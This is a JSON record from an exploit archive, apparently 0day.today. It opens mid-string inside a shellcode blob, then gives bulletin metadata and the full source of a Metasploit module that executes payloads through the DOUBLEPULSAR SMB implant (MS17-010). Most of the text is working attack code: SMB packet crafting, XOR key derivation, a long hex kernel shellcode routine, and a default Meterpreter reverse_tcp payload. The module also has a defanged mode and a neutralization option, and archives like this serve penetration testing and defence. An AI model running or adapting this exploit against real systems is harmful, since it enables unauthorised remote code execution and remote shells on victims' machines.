\"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-26] #"}, "lastseen": "2021-09-26T00:16:00", "differentElements": ["sourceData"], "edition": 26}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "5f36a4a9bdda15cb6ef4c36df7daa9e7", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-26T22:18:45", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, 
{"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-26T00:16:00", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-26T00:16:00", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n 